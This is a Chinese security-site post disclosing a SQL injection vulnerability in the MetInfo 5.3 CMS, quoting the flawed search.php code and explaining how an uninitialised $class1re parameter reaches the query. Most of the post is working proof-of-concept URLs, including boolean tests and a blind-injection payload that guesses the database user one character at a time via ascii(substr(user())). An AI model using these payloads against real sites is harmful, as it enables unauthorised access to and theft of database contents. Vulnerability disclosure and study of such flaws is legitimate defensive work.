歡迎來到 黑吧安全網 聚焦網絡安全前沿資訊,精華內容,交流技術心得!

MetInfo5.3 最新版本SQL注入漏洞

來源:本站整理 作者:佚名 時間:2015-07-13 TAG: 我要投稿

MetInfo5.3 最新版本SQL注入

search.php:
$module=intval($module);
    if($class1)$module=0;
    if(intval($module)){
      $serch_sql.=" where lang='$lang' and (recycle='0' or recycle='-1') and displaytype='1' ";
 }else{
 $class1_info=$class_list[$class1];
 if(!$class1_info)okinfo('../',$pagelang[noid]);
 $class1sql=" class1='$class1' ";
 $class2sql=" class2='$class2' ";
 $class3sql=" class3='$class3' ";
 
 if($class1&&!$class2&&!$class3){
  foreach($module_list2[$class_list[$class1]['module']] as $key=>$val){
   if($val['releclass']==$class1){
    $class1re.=" or class1='$val[id]' ";
   }
  }
  if($class1re){
   $class1sql='('.$class1sql.$class1re.')';
  }
 }
 if($class_list[$class2]['releclass']){
  $class1sql=" class1='$class2' ";
  $class2sql=" class2='$class3' ";
  $class3sql="";
 }
 $serch_sql=" where lang='$lang' and (recycle='0' or recycle='-1') and displaytype='1' and $class1sql ";
由于$class1re 沒有進行初始化,所以全局只需要越過
foreach($module_list2[$class_list[$class1]['module']] as $key=>$val){
   if($val['releclass']==$class1){
    $class1re.=" or class1='$val[id]' ";
   }
  }
這一條邏輯即可:發送url:http://localhost/MetInfo5.3/search/search.php?class1=2&class2=&class3=&searchtype=1&searchword=1&lang=cn&class1re=xxxxxx抓取sql語句為:2015/4/8 14:39 SELECT COUNT(*) FROM met_news where lang='cn' and (recycle='0' or recycle='-1') and displaytype='1' and ( class1='2' xxxxxx) and title like '%1%'然后進行構造http://localhost/MetInfo5.3/search/search.php?class1=2&class2=&class3=&searchtype=2&searchword=xxxxxx&lang=cn&class1re=) and 1=1-- sd頁面是:

http://localhost/MetInfo5.3/search/search.php?class1=2&class2=&class3=&searchtype=2&searchword=xxxxxx&lang=cn&class1re=) and 1=2-- sd

payload:http://localhost/MetInfo5.3/search/search.php?class1=2&class2=&class3=&searchtype=2&searchword=xxxxxx&lang=cn&class1re=) and if(ascii(substr(user(),1,1))=$NUM,1,0)-- sd根據頁面變化 補充$NUM來進行敏感信息猜測由于我這里是roothttp://localhost/MetInfo5.3/search/search.php?class1=2&class2=&class3=&searchtype=2&searchword=xxxxxx&lang=cn&class1re=) and if(ascii(substr(user(),1,1))=114,1,0)-- sd頁面里面沒有xxxxxxhttp://localhost/MetInfo5.3/search/search.php?class1=2&class2=&class3=&searchtype=2&searchword=xxxxxx&lang=cn&class1re=) and if(ascii(substr(user(),1,1))=1141,1,0)-- sd頁面里面有xxxxx
 

【聲明】:黑吧安全網(http://www.gkrbnd.live)登載此文出于傳遞更多信息之目的,并不代表本站贊同其觀點和對其真實性負責,僅適于網絡安全技術愛好者學習研究使用,學習中請遵循國家相關法律法規。如有問題請聯系我們,聯系郵箱[email protected],我們會在最短的時間內進行處理。
  • 最新更新
    • 相關閱讀
      • 本類熱門
        • 最近下載
        福彩原副主任